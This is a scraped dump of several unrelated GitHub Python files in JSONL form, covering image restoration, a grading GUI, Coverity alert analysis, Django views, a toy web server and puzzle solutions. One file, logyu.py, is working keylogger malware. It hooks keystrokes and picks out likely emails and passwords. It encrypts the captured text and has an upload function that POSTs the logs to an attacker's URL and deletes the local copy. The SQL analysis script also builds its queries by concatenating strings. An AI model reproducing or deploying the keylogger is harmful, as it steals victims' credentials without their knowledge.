\".png\" or f.suffix == \".jpg\"\n ]\n )\n\n real_imgs = (\n real_imgs[: int(len(real_imgs) * split_ratio)]\n if split == \"train\"\n else real_imgs[int(len(real_imgs) * split_ratio) :]\n )\n\n # Load clean images to which we will add synthetic noise\n data_for_synthesis_dir = Path(data_dir + \"/non_noisy\")\n imgs_for_synthesis = sorted(\n [\n str(f)\n for f in data_for_synthesis_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n imgs_for_synthesis = (\n imgs_for_synthesis[: int(len(imgs_for_synthesis) * split_ratio)]\n if split == \"train\"\n else imgs_for_synthesis[int(len(imgs_for_synthesis) * split_ratio) :]\n )\n\n # Combine the two sets of images\n self.imgs = [(path, 1.0) for path in real_imgs] + [\n (path, 0.0) for path in imgs_for_synthesis\n ]\n np.random.shuffle(self.imgs)\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = io.read_image(self.imgs[idx][0]).float()\n if self.imgs[idx][1] == 0.0: # if image is clean then we add synthetic noise\n img = random_degradation(img)\n img = data_transform(img)\n\n return rescale_colors(img), self.imgs[idx][1]\n\n\n# DataModule for the 3 phases : A, B, Mapping\nclass GenericDataModule(LightningDataModule):\n def __init__(\n self,\n data_dir: str,\n batch_size: int = 16,\n num_workers: int = 4,\n phase: str = \"A\",\n split_ratio=0.75,\n ):\n super().__init__()\n\n self.data_dir = data_dir\n 
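# Hedged sketch of the paired clean/noisy idea behind MappingDataset above:
# each item is the clean tensor stacked with a degraded copy. Plain Gaussian
# noise stands in for the full random_degradation pipeline.
import torch
from torch.utils.data import Dataset

class PairedNoiseDataset(Dataset):
    def __init__(self, images):
        self.images = images  # list of (C, H, W) float tensors in [0, 255]

    def __len__(self):
        return len(self.images)

    def __getitem__(self, idx):
        clean = self.images[idx]
        noisy = torch.clamp(clean + torch.randn_like(clean) * 25.0, 0.0, 255.0)
        return torch.stack([clean, noisy]), 0.0

ds = PairedNoiseDataset([torch.rand(3, 8, 8) * 255])
pair, _ = ds[0]
print(pair.shape)  # torch.Size([2, 3, 8, 8])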
self.batch_size = batch_size\n self.num_workers = num_workers\n self.phase = phase\n self.split_ratio = split_ratio\n\n def setup(self, stage=None) -> None:\n if self.phase == \"A\":\n self.val_dataset = PhaseADataset(\n self.data_dir, split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = PhaseADataset(\n self.data_dir, split=\"train\", split_ratio=self.split_ratio\n )\n elif self.phase == \"B\":\n self.val_dataset = VanillaDataset(\n self.data_dir + \"/non_noisy\", split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = VanillaDataset(\n self.data_dir + \"/non_noisy\",\n split=\"train\",\n split_ratio=self.split_ratio,\n )\n elif self.phase == \"Mapping\":\n self.val_dataset = MappingDataset(\n self.data_dir, split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = MappingDataset(\n self.data_dir, split=\"train\", split_ratio=self.split_ratio\n )\n elif self.phase == \"Vanilla\":\n self.val_dataset = VanillaDataset(\n self.data_dir, split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = VanillaDataset(\n self.data_dir, split=\"train\", split_ratio=self.split_ratio\n )\n else:\n raise Exception(\"Invalid phase\")\n print(\"Dataset size : \", len(self.train_dataset))\n\n def train_dataloader(self):\n return DataLoader(\n self.train_dataset,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n shuffle=True,\n )\n\n def val_dataloader(self):\n return DataLoader(\n self.val_dataset,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n shuffle=False,\n )\n\n def test_dataloader(self):\n return DataLoader(\n self.val_dataset,\n batch_size=16,\n num_workers=self.num_workers,\n shuffle=True,\n )\n","repo_name":"Thomick/Image-Restoration","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4871580094","text":"# Standard Library\nimport glob\nimport os\nfrom tkinter import END, Button, Checkbutton, Entry, IntVar, Label, StringVar, Tk\nfrom tkinter.filedialog import askopenfilename\n\nfrom file_management.compile import compile_c\nfrom file_management.feedback import (\n create_feedback_file,\n format_names,\n get_missing_names,\n open_feedback_file,\n)\nfrom file_management.zip_archives import setup_safe_mode, unzip, unzip_outer\n\n\nclass App(object):\n def __init__(self):\n self.version = \"0.1.1\"\n self.root = Tk()\n\n # set default dimensions, color and title\n self.grey = \"#909296\"\n self.yellow = \"#f7f574\"\n self.green = \"#93b185\"\n\n self.root.geometry(\"600x450\")\n self.root.wm_title(f\"CompCorrector v{self.version}\")\n\n self.label = Label(self.root, text=\"path to zipfile\")\n self.label.pack(pady=5)\n\n # text entry for zip path\n self.zip_dir = StringVar()\n self.entry_zip_dir = Entry(self.root, textvariable=self.zip_dir, width=\"400\", bg=self.grey)\n self.entry_zip_dir.pack(pady=5)\n\n # open zip button\n self.buttontext = StringVar()\n self.buttontext.set(\"CHOOSE ZIP\")\n Button(\n self.root,\n textvariable=self.buttontext,\n command=self.select_zip_file,\n bg=self.yellow,\n ).pack(pady=5)\n\n self.label = Label(self.root, text=\"list of names\")\n self.label.pack(pady=5)\n\n # text entry for names\n self.names = StringVar()\n self.entry_names = Entry(self.root, textvariable=self.names, width=\"400\", bg=self.grey)\n self.entry_names.pack(pady=5)\n\n # check-boxes\n self.rm_zips = IntVar()\n self.rm_zips.set(False)\n self.check_rm_zips = 
Checkbutton(\n self.root,\n variable=self.rm_zips,\n onvalue=True,\n offvalue=False,\n text=\"remove zips\",\n )\n\n self.compile = IntVar()\n self.compile.set(False)\n self.check_compile = Checkbutton(\n self.root,\n variable=self.compile,\n onvalue=True,\n offvalue=False,\n text=\"compile files\",\n )\n\n self.safe_mode = IntVar()\n self.safe_mode.set(False)\n self.check_safe_mode = Checkbutton(\n self.root,\n variable=self.safe_mode,\n onvalue=True,\n offvalue=False,\n text=\"safe mode\",\n )\n\n self.feedback = IntVar()\n self.feedback.set(False)\n self.check_feedback = Checkbutton(\n self.root,\n variable=self.feedback,\n onvalue=True,\n offvalue=False,\n text=\"feedback.docx\",\n )\n\n # have checkbox checked by default\n self.check_rm_zips.select()\n self.check_compile.select()\n self.check_safe_mode.select()\n self.check_feedback.select()\n\n # place checkboxes on gui\n self.check_safe_mode.pack()\n self.check_rm_zips.pack()\n self.check_compile.pack()\n self.check_feedback.pack()\n\n # set open dir button\n self.buttontext2 = StringVar()\n self.buttontext2.set(\"START\")\n Button(\n self.root,\n textvariable=self.buttontext2,\n command=self.run_main,\n bg=self.green,\n ).pack(pady=5)\n\n # label for errors\n self.error_label = Label(self.root, text=\"\", foreground=\"red\", bg=self.grey)\n self.error_label.pack(pady=5)\n\n # label for warnings\n self.warning_label = Label(self.root, text=\"\", foreground=self.yellow, bg=self.grey)\n self.warning_label.pack(pady=5)\n\n # label for completion\n self.completion_label = Label(self.root, text=\"\", bg=self.grey)\n self.completion_label.pack(pady=5)\n\n self.root.mainloop()\n\n def append_warning(self, warning_text):\n self.warning_label.configure(text=f\"{self.warning_label.cget('text')} {warning_text}\\n\")\n\n def append_error(self, error_text):\n self.error_label.configure(text=f\"{self.error_label.cget('text')} {error_text}\\n\")\n\n def flush_labels(self):\n self.warning_label.configure(text=\"\")\n self.error_label.configure(text=\"\")\n self.completion_label.configure(text=\"\")\n\n def select_zip_file(self):\n self.flush_labels()\n filename = askopenfilename()\n if filename.endswith(\".zip\"):\n # flush old text and insert new selected file\n self.entry_zip_dir.delete(0, END)\n self.entry_zip_dir.insert(0, filename)\n else:\n self.append_error(f\"You must select a .zip file to begin. Got {filename}\")\n\n file_dir = os.path.dirname(filename)\n if not self.safe_mode.get() and len(glob.glob(f\"{file_dir}/*\")) > 1:\n self.append_warning(\n f\"Be careful, there are multiple items in the current directory: {file_dir}\"\n )\n\n def run_compile(self, cwd):\n try:\n compiled = compile_c(cwd)\n if compiled > 0:\n self.append_error(f\"Error compiling {compiled} file(s)\")\n except:\n self.append_error(f\"Exception compiling file(s)\")\n raise\n\n def run_feedbac(self, cwd, names, missing_names):\n try:\n feedback_file = create_feedback_file(cwd, names, missing_names)\n open_feedback_file(feedback_file)\n except:\n self.append_error(\"Exception creating feedback.docx\")\n raise\n\n def main(self):\n self.flush_labels()\n\n try:\n names = format_names(self.entry_names.get())\n except:\n self.append_error(\"Exception parsing names\")\n print(\"Exception parsing names\")\n return False\n\n zip_path = self.entry_zip_dir.get()\n if not zip_path.endswith(\".zip\"):\n self.append_error(f\"You must select a .zip file to begin. 
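# Minimal sketch of the Tk variable wiring used by the App class above:
# a StringVar backs an Entry, an IntVar backs a Checkbutton, and both are
# read back with .get(). Needs a display, so run locally rather than headless.
from tkinter import Tk, Entry, Checkbutton, StringVar, IntVar

root = Tk()
path = StringVar()
Entry(root, textvariable=path).pack()

safe_mode = IntVar()
safe_mode.set(True)
Checkbutton(root, variable=safe_mode, onvalue=True, offvalue=False,
            text="safe mode").pack()

path.set("/tmp/archive.zip")
print(path.get(), bool(safe_mode.get()))
root.destroy()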
Got {zip_path}\")\n return False\n\n # at this point names are list of strings and directory is correct\n cwd = os.path.dirname(zip_path)\n\n if self.entry_names.get().strip() == \"\":\n self.append_warning(\n f\"No names included. All files will be extracted and feedback.docx will be empty\"\n )\n\n # TODO: remove concept of safemode. Always run this way, don't allow unsafe mode.\n if self.safe_mode.get():\n cwd, zip_path = setup_safe_mode(cwd, zip_path)\n\n # if safe mode is enabled, move zip to safe folder, then run.\n # otherwise run in directory zip already is.\n unzip_outer(zip_path, names)\n\n # get directory of zipfile, unzip and move files in subdirectories\n extraction_errors = unzip(cwd, rm_zips=self.rm_zips.get())\n if extraction_errors:\n self.append_error(f\"Exception extracting: {extraction_errors}\")\n\n missing_names = get_missing_names(cwd, names)\n if missing_names:\n self.append_warning(f\"The following students seem to be missing files: {missing_names}\")\n\n if self.compile.get():\n self.run_compile(cwd)\n\n if self.feedback.get():\n self.run_feedbac(cwd, names, missing_names)\n\n self.completion_label.configure(text=\"Finished!\")\n print(\"Finished!\")\n\n def run_main(self):\n try:\n self.main()\n except:\n # catch exception to allow prompt within ui, then re-raise exception\n self.error_label.configure(\n text=f\"{self.error_label.cget('text')} Unhandled Exception. Check the console\\n\"\n )\n raise\n\n\nif __name__ == \"__main__\":\n App()\n","repo_name":"ConorSheehan1/comp_corrector","sub_path":"src/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":7684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30865437524","text":"# import statement\nimport pymysql\nimport sys\nimport numpy as np\nimport datetime\nimport re\nimport subprocess\nimport shlex\nimport os\nfrom openpyxl import Workbook\nimport dateutil.parser as dp\n\n# open sql connection\nconnection = pymysql.connect(host='localhost',\n user='root',\n db='soverityscan_sandbox',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor,\n autocommit=True)\n\ndef execute(query):\n with connection.cursor() as cursor:\n cursor.execute(query)\n results = cursor.fetchall()\n return results\n\nf=open('temp.txt','w')\nprojects=['Linux','Firefox','Samba','Kodi','Ovirt-engine']\n\nfor project in projects:\n query=\"select count(*) as c from alerts where is_invalid=0 and stream='\"+project+\"';\"\n total_alerts=execute(query)[0]['c']\n # need to subtract new alerts that are alive for less the median lifespan of actionable alerts\n \n query='''select count(*) as c from actionability ac\n join alerts a \n on a.idalerts=ac.alert_id\n where ac.actionability = 1\n and a.is_invalid=0\n and a.stream=\"''' + project + '\"'\n actionable_count=execute(query)[0]['c']\n \n query='''select datediff(s.date,a.first_detected) as diff from actionability ac\n join alerts a \n on a.idalerts=ac.alert_id\n join snapshots s\n on a.last_snapshot_id=s.idsnapshots\n where ac.actionability = 1\n and a.is_invalid=0\n and a.stream=\"''' + project + '\"'\n results=execute(query)\n temp=[]\n for item in results:\n temp.append(item['diff'])\n \n actionable_lifespan=np.median(temp)\n\n query='''select count(*) as c\n from alerts \n where stream=\"'''+project+'''\"\n and status='New'\n and is_invalid=0\n and datediff(\n (select date\n from snapshots\n where stream=\"'''+project+'''\"\n order by idsnapshots desc\n limit 1),\n first_detected\n ) <=''' 
+str(actionable_lifespan)\n too_new_to_count=execute(query)[0]['c']\n adjusted_total=total_alerts - too_new_to_count\n actionability_rate=round(((float(actionable_count)/adjusted_total)*100),1)\n\n query=\"select count(*) as c from alerts where is_invalid=0 and status='Fixed' and stream='\"+project+\"';\"\n eliminated=execute(query)[0]['c']\n elim_rate=round(((float(eliminated)/total_alerts)*100),1)\n\n query=\"select count(*) as c from alerts where is_invalid=0 and classification='Bug' and stream='\"+project+\"';\"\n bug=execute(query)[0]['c']\n bug_rate=round(((float(bug)/total_alerts)*100),1)\n\n elim=str(eliminated)+' ('+str(elim_rate)+'\\%)'\n act=str(actionable_count)+' ('+str(actionability_rate)+'\\%)'\n traiged_bug=str(bug)+' ('+str(bug_rate)+'\\%)'\n\n temp=[project,total_alerts,elim,act,traiged_bug]\n\n f.write('&'.join(str(x) for x in temp)+r'\\\\'+'\\n')\n","repo_name":"nasifimtiazohi/Coverity-Data-Analysis","sub_path":"issre_analysis/actionability_analysis.py","file_name":"actionability_analysis.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34415605462","text":"import keyboard\nimport os\nimport re\nfrom typing import IO\nimport requests\nimport uuid\nimport time\nimport encryption_decryption\n\n\nclass Word:\n def __init__(self) -> None:\n self.letters = \"\" # Contains the actual letters of the word\n self.status = False # Status of the word being typed, whether the user has finished typing it out or not\n self.priority = 2 # Priority of the word, check @word_priority_predictor\n\n# Create a filename based off the current timestamp and the infected device's MAC address\n# The name is in the format timestamp MAC address\n# This allows the attacker to identify each infected and each uploaded file per infected\n\ndef generate_file_name()-> str:\n time_stamp = time.strftime('%Y-%m-%d %H.%M.%S', time.localtime())\n return str(time_stamp+\" \"+str(uuid.getnode()))\n\n# Creates the logged_words_file and returns an IO object for writing to the file\ndef create_logged_words_file(path:str, file_name:str)->IO:\n file_path = os.path.join(os.path.abspath(path), file_name)\n return open(file_path, \"ab\")\n\n# Determines the priority of a word bassed off of how likely it is to be a password\ndef word_priority_predictor(word: Word)->int:\n # Matches any string that is 8 characters or more, as most passwords usually are\n length_regex = re.compile(r'^.{8,}$')\n # Matches any string that includes a mix of uppercase and lowercase letters, numbers, and special characters, which is usually a password requirement\n special_char_regex = re.compile(r'^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#?!@$%^&*-])\\S+$')\n\n if length_regex.match(word.letters):\n if special_char_regex.match(word.letters) or len(word.letters.split(\"password:\"))>1:\n word.priority = 0\n else:\n word.priority = 1\n\n# Keeps track of the word being typed until enter or space or tab is logged\ndef read_word_being_typed(event: keyboard.KeyboardEvent, word: Word):\n # If enter, space or tab is logged then return true cause we assume the infected has finished typing the word\n if (event.name == \"enter\" or event.name == \"space\" or event.name == \"tab\"):\n if email_check(word.letters):\n word.letters = f\"email: {word.letters} password: \"\n return\n\n word_priority_predictor(word)\n if word.priority < 2:\n word.status = True\n else:\n word.letters = \"\"\n elif event.name == \"backspace\":\n word.letters = 
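# Standalone check of the password-likeness heuristics used by
# word_priority_predictor() above: length first, then the mixed-character
# rule; lower numbers mean higher priority, as in the Word class.
import re

length_re = re.compile(r"^.{8,}$")
special_re = re.compile(r"^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#?!@$%^&*-])\S+$")

def priority(word):
    if length_re.match(word):
        return 0 if special_re.match(word) else 1
    return 2

for w in ("short", "longenough", "Str0ng!pass"):
    print(w, priority(w))  # 2, 1, 0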
word.letters[:-1] if word.letters else \"\" # To avoid an IndexError for cases where the string is empty\n else:\n # Update the word string if only one character was entered, to avoid saving keyboard events like ctrl, shift etc\n if len(event.name)==1:\n word.letters+=event.name\n\n# Check whether the typed word is potentially an email\ndef email_check(word: str):\n email_regex = re.compile('^[\\w+\\-.]+@[a-z\\d\\-]+(\\.[a-z\\d\\-]+)*\\.[a-z]+$')\n return email_regex.match(word)\n\n# Encrypt the logged word then write it to the logged_words_file\ndef update_logged_words_file(words: list[Word], public_key: encryption_decryption.rsa.RSAPublicKey, file: IO):\n #Final string containing all the logged words\n final_string = \"\"\n for word in words:\n final_string+=f\"{word.letters} {word.priority}\\n\"\n # Convert the string into bytes for encryption\n encoded = final_string.encode() \n encrypted = encryption_decryption.encrypt(encoded, public_key)\n file.write(encrypted)\n print(\"Logged\")\n\n# Upload the file to whatever site the attacker wants then delete it in the infected device\ndef upload(file_path:str, file_name:str, url:str, token:str)->bool:\n with open(file_path, \"rb\") as f:\n file = {\"file\": (file_name, f)}\n response = requests.post(url=url+token, files=file)\n os.unlink(file_path)\n return response.json()[\"status\"]\n\nroot_script_path = \"./\"\npublic_key_path = root_script_path+\"public_key.pem\"\nlogged_files_folder = root_script_path+\"/logged_files\"\nupload_rate = 2 # Rate at which logged words should be uploaded, e.g upload_rate = 2 would mean upload after every two words \n\n# Script loop\ndef main():\n if not os.path.exists(logged_files_folder): os.mkdir(logged_files_folder)\n logged_words_file = create_logged_words_file(logged_files_folder, generate_file_name())\n public_key = encryption_decryption.load_public_key(public_key_path)\n words = []\n while True:\n word = Word()\n words.append(word)\n # lambda function in order the pass the word object to read_word_being_typed, kinda hacky\n hooked_function = lambda event: read_word_being_typed(event, word)\n hook = keyboard.on_press(hooked_function)\n while not word.status: pass\n keyboard.unhook(hook)\n if len(words) == upload_rate:\n update_logged_words_file(words, public_key, logged_words_file)\n logged_words_file = create_logged_words_file(logged_files_folder, generate_file_name()) \n words = []\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"SenZmaKi/LogYu","sub_path":"logyu.py","file_name":"logyu.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41712967436","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom recipe.forms import RecipeForm, DeleteRecipeForm\nfrom recipe.models import Recipe\n\n\ndef homepage(request):\n recipes = Recipe.objects.all()\n context = {\n 'recipes': recipes\n }\n return render(request, 'index.html', context)\n\n\ndef create_recipe(request):\n if request.method == 'GET':\n form = RecipeForm(label_suffix='')\n return render(request, 'recipe/create.html', {'form': form})\n elif request.method == 'POST':\n form = RecipeForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('homepage')\n\n return render(request, 'recipe/create.html', {'form': form})\n\n\ndef edit_recipe(request, recipe_id):\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n\n if request.method == 'GET':\n form = RecipeForm(label_suffix='', instance=recipe)\n 
context = {\n 'form': form,\n 'recipe_id': recipe.id\n }\n return render(request, 'recipe/edit.html', context)\n\n elif request.method == 'POST':\n form = RecipeForm(request.POST, instance=recipe)\n\n if form.is_valid():\n form.save()\n return redirect('homepage')\n\n context = {\n 'form': form,\n 'recipe_id': recipe.id\n }\n\n return render(request, 'recipe/edit.html', context)\n\n\ndef delete_recipe(request, recipe_id):\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n\n if request.method == 'GET':\n form = DeleteRecipeForm(instance=recipe, label_suffix='')\n context = {\n 'form': form,\n 'recipe_id': recipe.id\n }\n return render(request, 'recipe/delete.html', context)\n elif request.method == 'POST':\n recipe.delete()\n return redirect('homepage')\n\n\ndef details_recipe(request, recipe_id):\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n ingredients_list = recipe.ingredients.split(', ')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients_list\n }\n return render(request, 'recipe/details.html', context)","repo_name":"dkutelov/django_study_projects","sub_path":"recipes/recipe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17756690918","text":"#Python 3.7\n\nfrom socket import *\nimport sys, os\nimport re\nimport mimetypes\n\ndef main():\n if(len(sys.argv) < 2):\n print(\"Error!! Usage: Python WebServer.py port\\n\")\n return\n\n port = int(sys.argv[1])\n\n server_socket = socket(AF_INET, SOCK_STREAM)\n server_socket.bind(('127.0.0.1', port))\n\n server_socket.listen(1)\n\n\n while True:\n connection_socket, addr = server_socket.accept()\n data = connection_socket.recv(1024)\n\n\n if data:\n response_line, extra_headers, response_body = handle_request(data)\n connection_socket.send(response_line.encode())\n connection_socket.send(extra_headers.encode())\n connection_socket.send(response_body)\n\n connection_socket.close()\n\ndef handle_request(data):\n data = data.decode()\n lines = data.split('\\r\\n')\n request = lines[0]\n\n file = re.search('GET /(.+) HTTP/1.1', request).group(1)\n \n if os.path.exists(file):\n response_line = \"HTTP/1.1 {} {}\\r\\n\".format(200,'OK')\n content_type = mimetypes.guess_type(file)[0] or 'text/html'\n extra_headers = \"Content-Type: {}\\r\\n\\r\\n\".format(content_type)\n\n with open(file, 'rb') as f:\n response_body = f.read()\n else:\n response_line = \"HTTP/1.1 {} {}\\r\\n\".format(404,'Not Found')\n extra_headers = \"Content-Type: text/html\\r\\n\\r\\n\"\n response_body = \"
<html><body><h1>404 Not Found</h1></body></html>
\".encode()\n\n return response_line, extra_headers, response_body\n\nif __name__ == \"__main__\":\n main()","repo_name":"garyCC227/comp3331","sub_path":"lab3_temp/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6637091727","text":"import sys\r\nimport math\r\nimport re\r\n\r\n\r\ndef get_data(my_file):\r\n with open(my_file) as f:\r\n line = f.read()\r\n matches = list(map(int, re.findall(r\"([-0-9]+)\", line)))\r\n return matches\r\n\r\n\r\ndef get_number(x_target, y_target):\r\n y_max = max(abs(y_target[0]), abs(y_target[1]))\r\n y_min = min(abs(y_target[0]), abs(y_target[1]))\r\n x_max = max(abs(x_target[0]), abs(x_target[1]))\r\n x_min = min(abs(x_target[0]), abs(x_target[1]))\r\n a_number = 0\r\n n = 0\r\n velocities = list()\r\n while True:\r\n n_number = 1\r\n y_lower = math.ceil(n / 2 - y_max / (n + 1))\r\n y_upper = math.floor(n / 2 - y_min / (n + 1))\r\n x_lower = math.ceil(x_min / (n + 1) + n / 2)\r\n x_upper = math.floor(x_max / (n + 1) + n / 2)\r\n if n >= x_upper:\r\n x_lower, x_upper = 16, 17\r\n if y_upper >= y_lower:\r\n n_number *= (y_upper - y_lower + 1)\r\n else:\r\n n_number = 0\r\n if x_upper >= x_lower:\r\n n_number *= (x_upper - x_lower + 1)\r\n if n_number > 0:\r\n for x in range(x_lower, x_upper + 1):\r\n for y in range(y_lower, y_upper + 1):\r\n if (x, y) not in velocities:\r\n velocities.append((x, y))\r\n a_number += n_number\r\n if y_lower > y_max:\r\n break\r\n n += 1\r\n return a_number, velocities\r\n\r\n\r\ndef main(my_file):\r\n target = get_data(my_file)\r\n x_target = target[0:2]\r\n y_target = target[2:]\r\n a_number, velocities = get_number(x_target, y_target)\r\n print(len(velocities))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) > 1:\r\n filename = sys.argv[1]\r\n else:\r\n filename = \"17_input.txt\"\r\n main(filename)\r\n","repo_name":"krzyssikora/advent_of_code","sub_path":"aoc_2021/17_2_probe.py","file_name":"17_2_probe.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2575971827","text":"'''\n\nLargest-Amount-that-Cannot-Be-Paid-with-5-and-7-Coins\n\nImagine we have only 5- and 7-coins. One can prove that any large \nenough integer amount can be paid using only such coins. Yet clearly we \ncannot pay any of numbers 1, 2, 3, 4, 6, 8, 9 with our coins. 
\nWhat is the maximum amount that cannot be paid?\n\n'''\n\ndef change(amount):\n \n # assert(amount >= 5 \n # and amount != 9\n # and amount != 11\n # and amount != 13\n # and amount != 16\n # and amount != 18\n # )\n \n if(amount < 5):\n return ['X']\n \n if amount == 5:\n return [5]\n \n if amount == 7:\n return [7]\n \n if amount == 10:\n return [5,5]\n \n if amount == 12:\n return [5,7]\n \n if amount == 12:\n return [5,7]\n \n if(amount % 5 == 0):\n coins = change(amount - 5)\n coins.append(5)\n else:\n coins = change(amount - 7)\n coins.append(7)\n return coins\n \nresult = []\nfor i in range(1000):\n result.append(change(i))\n \ncount = 0\nfor i in result:\n if('X' in i):\n print(count, i)\n count += 1\n \n","repo_name":"vasidzius/Introduction-to-Discrete-Mathematics-for-Computer-Science","sub_path":"Course-1-Mathematical-Thinking-in-Computer-Science/Largest-Amount-that-Cannot-Be-Paid-with-5-and-7-Coins.py","file_name":"Largest-Amount-that-Cannot-Be-Paid-with-5-and-7-Coins.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22166698378","text":"class Pair:\r\n def __init__(self, v, w):\r\n self.first = v\r\n self.second = w\r\n\r\n def __str__(self):\r\n return \"<\" + str(self.first) + \",\" + str(self.second) + \">\"\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\nclass Graph:\r\n def __init__(self, V, dir):\r\n self.list = []\r\n for _ in range(V):\r\n self.list.append([].copy())\r\n self.num_vertices = V\r\n self.directed = dir\r\n\r\n # dummy values\r\n self.parent = [-1]*V\r\n self.visited = [0]*V\r\n self.depth = [-1]*V\r\n\r\n def connect(self, a, b, w = 1):\r\n self.list[a].append(Pair(b, w))\r\n if not self.directed:\r\n self.list[b].append(Pair(a, w))\r\n\r\n def BFS(self, s):\r\n self.visited = [0]*self.num_vertices\r\n\r\n q = []\r\n q.append(s)\r\n self.visited[s] = 1\r\n self.depth[s] = 0\r\n\r\n while q:\r\n u = q.pop(0)\r\n for i in range(len(self.list[u])):\r\n if self.visited[self.list[u][i].first] == 0:\r\n self.visited[self.list[u][i].first] = 1\r\n self.depth[self.list[u][i].first] = self.depth[u] + 1\r\n q.append(self.list[u][i].first)\r\n\r\n def shortest_path_length(self, v):\r\n return self.depth[v]\r\n\r\nimport sys\r\nn = int(input())\r\nm = []\r\nfor line in sys.stdin:\r\n m.append(line.strip())\r\n\r\ndef knight(r, c):\r\n res = []\r\n for i in [-2, -1, 1, 2]:\r\n for j in [-2, -1, 1, 2]:\r\n if abs(i) + abs(j) == 3:\r\n res.append((r + i, c + j))\r\n return res\r\n\r\ng = Graph(n**2, False)\r\nfor i in range(n):\r\n for j in range(n):\r\n if m[i][j] == 'K':\r\n source = i * n + j\r\n if m[i][j] != '#':\r\n for r, c in knight(i, j):\r\n if r in range(n) and c in range(n) and m[r][c] != '#':\r\n g.connect(r*n + c, i*n + j)\r\ng.BFS(source)\r\nprint(g.shortest_path_length(0))","repo_name":"RussellDash332/kattis","sub_path":"src/Knight Jump/knightjump.py","file_name":"knightjump.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"8249483038","text":"# fmt:off\nfrom torch_uncertainty.datasets.regression.toy import Cubic\n\n\n# fmt:on\nclass TestCubic:\n \"\"\"Testing the Cubic dataset class.\"\"\"\n\n def test_main(self):\n ds = Cubic(num_samples=10)\n _ = ds[9]\n _ = 
len(ds)\n","repo_name":"ENSTA-U2IS/torch-uncertainty","sub_path":"tests/datasets/test_regression_toy.py","file_name":"test_regression_toy.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"40"} +{"seq_id":"3044532163","text":"import json\nimport pickle\n\ndatafile_pi = \"tests/z4_price_info_40.json\"\ndatafile_prod = \"tests/z4_products_40.pkl\"\n\nwith open(datafile_pi, mode=\"r\") as f:\n data = json.load(f)\n\nwith open(datafile_prod, mode=\"rb\") as f:\n prods = pickle.load(f)\n\ndef price_update(product, price_info):\n method = price_info[\"method\"]\n if method == \"add\":\n product[\"price\"] += price_info[\"param\"]\n elif method == \"sub\":\n product[\"price\"] -= price_info[\"param\"]\n elif method == \"percent+\":\n product[\"price\"] *= (1 + price_info[\"param\"])\n elif method == \"percent-\":\n product[\"price\"] *= (1 - price_info[\"param\"])\n\n #return product\n return 1\n\n\npid = {}\n\nfor v in data:\n pid[v['name']] = v\n\n# V1\n# [price_update(v, pid[v['name']]) for v in prods]\n\n# V2\n# t = map(lambda v: price_update(v, pid[v['name']]), prods)\n# print(set(t))\n\n# V3\nfor v in prods:\n price_update(v, pid[v['name']])\n\nwith open(datafile_prod + \"_out\", \"wb\") as f:\n pickle.dump(prods, f)\n\n\n# DBG\n#with open(datafile_prod + \"_out\", mode=\"rb\") as f:\n# prods = pickle.load(f)\n#print(prods)\n","repo_name":"AAEfimov/Data_Eng","sub_path":"practice_2/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"45382052195","text":"import argparse\nimport joblib\nimport numpy as np\n\n# Load the saved model\nloaded_model = joblib.load('iris_model.pkl')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Predict Iris Flower Species')\n\n # Define command-line arguments for input features\n parser.add_argument('--sepal_length', type=float,\n required=True, help='Sepal length in cm')\n parser.add_argument('--sepal_width', type=float,\n required=True, help='Sepal width in cm')\n parser.add_argument('--petal_length', type=float,\n required=True, help='Petal length in cm')\n parser.add_argument('--petal_width', type=float,\n required=True, help='Petal width in cm')\n\n args = parser.parse_args()\n\n # Collect input features\n input_features = np.array([[\n args.sepal_length,\n args.sepal_width,\n args.petal_length,\n args.petal_width\n ]])\n\n # Predict the class\n predicted_class = 